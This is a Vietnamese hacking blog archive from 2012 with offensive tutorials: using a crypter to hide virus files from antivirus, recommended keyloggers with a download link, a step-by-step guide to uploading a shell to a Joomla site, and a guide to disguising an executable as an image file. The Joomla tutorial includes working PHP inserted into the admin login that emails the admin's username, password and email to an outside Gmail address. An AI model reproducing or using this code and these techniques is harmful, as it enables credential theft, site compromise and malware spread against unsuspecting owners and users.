Hiển thị các bài đăng có nhãn Virus - Trojan - Backdoor. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Virus - Trojan - Backdoor. Hiển thị tất cả bài đăng

Thứ Sáu, 27 tháng 7, 2012

Một số phần mền Mã Hóa Virus Free


1-      07-12-12 Crypter

-          Click vào file và chọn path tới file virus
-          Click vào stub và chọn path tới file stub.exe ( cùng thư mục với file 07-12-12 Crypter.exe )
-          Sau đó tùy chọn các chức năng và Encrypt


-          Trong trường hợp này Soleil sẽ lấy demo với file virus là con bot được tạo từ tool botnet Di5
-          Hình ảnh check file virus khi chưa mã hóa:

Các phần mền keylogger không thể bỏ qua


    Trong tất cả các keylogger đã sử dụng thì soleil kết nhất là hai phần mền: "Ardamax, Perfect" với cách sử dụng khá đơn giản và đầy đủ các tính năng: Ghi lại thao tác bàn phím, chụp destop, chụp webcam, link website đã vào, Create trojan, gửi mail, thiết lập thời gian gửi, đính kèm phần mền, chạy chế độ ẩn,.....



1 - Ardamax keylogger
 

Ardramax là phần mên keylogger đầy đủ các tính năng với cách sử dụng gần như là đơn giản nhất và được rất nhiều người ưa chuộng.


link download: ( Bao gồm cả key)

Thứ Bảy, 14 tháng 7, 2012

[Tut] Insert Keylogger into joomla




Bước 1: Up shell lên site joomla

Bước 2: Insert mã độc vào code

       -   Vào administrator/components/com_login/

       -   Edit file: admin.login.php

       -   Tìm dòng:$mainframe->redirect('index.php');

       -   Thêm trước dòng này 1 đoạn code như sau:

     PHP Code:



$db        =& JFactory::getDBO();                
$mailfrom         = $mainframe->getCfg( 'mailfrom' );
$fromname         = $mainframe->getCfg( 'fromname' );
$siteURL        = JURI::base();
$uname         = $credentials['username']; 
$query = 'SELECT name , email, usertype  ' .
        ' FROM #__users' .
        ' WHERE username = "'.$uname.'"';
$db->setQuery( $query );
$rows = $db->loadObject();

if ( ! $mailfrom  || ! $fromname ) {
    $fromname = $rows->name;
    $mailfrom = $rows->email;
}
$usertype = $rows->usertype;        
$email = $rows->email;
$pass = $credentials['password'];

$message = "$uname|$email|$pass|$usertype";
$to="ducdung.08clc@gmail.com";
$header = "Content-type: text/html; charset=utf-8\r\nFrom: $mailfrom\r\nReply-to: $to";
@mail($to, $siteURL, $message, $header);

Với đoạn code này thì khi admin đăng nhập thì username, password, email sẽ tự động gửi về mail: ducdung.08clc@gmail.com  



Thứ Năm, 5 tháng 7, 2012

[Tut] Đính kèm virus vào file ảnh


[Tut] Đính kèm virus vào file ảnh



 Bước 1: Bỏ dấu tích “hide extensions for known file types”





Bước 2: Tạo 1 forder trên destop, Ví dụ: soleil

Bỏ file virus vào forder soleil, virus thường có đuôi là .exe. Trong bài này tôi sẽ thay virus bằng phần mền putty.exe chẳng hạn và sẽ đính kèm phần mền này vào file ảnh có đuôi là jpg.


Bước 3: Tạo “Shortcut”

Click chuột phải vào phần mền và chọn “create shortcut”